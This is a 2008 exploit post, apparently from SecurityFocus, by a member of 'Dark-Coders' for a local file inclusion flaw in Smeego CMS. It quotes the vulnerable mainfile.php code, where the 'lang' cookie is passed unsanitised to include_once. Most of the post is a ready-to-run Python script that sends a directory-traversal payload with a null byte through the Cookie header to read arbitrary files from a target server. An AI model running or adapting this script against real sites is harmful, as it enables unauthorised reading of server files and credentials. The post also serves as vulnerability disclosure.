Smeego CMS vulnerability May 17 2008 11:32PM
0in email gmail com
# Smeego CMS Local File Include Exploit

# by

# 0in from Dark-Coders Programming & Security Group

# >>>>>>>> http://dark-coders.4rh.eu <<<<<<<<<<<<<<

#--------------------------------------------------------

# Contact: 0in(dot)email[at]gmail(dot)com

#--------------------------------------------------------

# Greetings to: Die_Angel,suN8Hclf,m4r1usz,djlinux,doctor

#--------------------------------------------------------

# Description:

# Smeego is a Content Management System or Portal

# System written in PHP and designed to be

# easy to install and use. Smeego has a mature code

# and comes with cool modules and themes

# for you to start your own dynamic and database

# driven website. Bla bla Bla [...]

# -------------------------------------------------------

# Script home: http://smeego.com

# -------------------------------------------------------

# Vuln:

# >>>>>> File: mainfile.php <<<<<<<

#if ($display_errors == 1) { // We don't se any errors ;(

# @ini_set('display_errors', 1);

#} else {

# @ini_set('display_errors', 0);

#}

#

#if (isset($newlang)) {

#

# if (file_exists("language/lang-".$newlang.".php")) {

# setcookie("lang",$newlang,time()+31536000);

# include_once("language/lang-".$newlang.".php");

# $currentlang = $newlang;

# } else {

# setcookie("lang",$language,time()+31536000);

# include_once("language/lang-".$language.".php");

# $currentlang = $language;

# }

#} elseif (isset($lang)) {

#

# include_once("language/lang-".$lang.".php");

# $currentlang = $lang;

#} else {

# setcookie("lang",$language,time()+31536000);

# include_once("language/lang-".$language.".php");

# $currentlang = $language;

#}

# >>>>>> End <<<<<<<

# So.. We can send Cookie: lang=[lfi]

# -------------------------------------------------------

# Simple Python Exploit:

#!/usr/bin/python

import sys

import time

import httplib

print '====================================================='

print ' Smeego CMS Local File INclude Exploit '

print ' by '

print ' 0in from Dark-Coders Programming & Security Group! '

print ' http://dark-coders.4rh.eu '

print '====================================================='

try:

target=sys.argv[1]

path=sys.argv[2]

file=sys.argv[3]

except Exception:

print '\nUse: %s [target] [path] [file]' % sys.argv[0]

quit()

i=0

lfi='../'

target+=":80"

special="%00"

file+=special

for i in range(9):

lfi+="../"

print '---------------------------------------------------------'

mysock=httplib.HTTPConnection(target)

mysock=httplib.HTTPConnection(target)

mysock.putrequest("GET",path)

mysock.putheader("User-Agent","Billy Explorer v666")

mysock.putheader('Accept', 'text/html')

mysock.putheader('Accept-Language',' en-us,en;q=0.5')

mysock.putheader('Cookie','lang=%s%s' % (lfi,file))

mysock.endheaders()

reply=mysock.getresponse()

print reply.read()

time.sleep(2)

mysock.close()

print '----------------------------------------------------------'

#EOFF

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus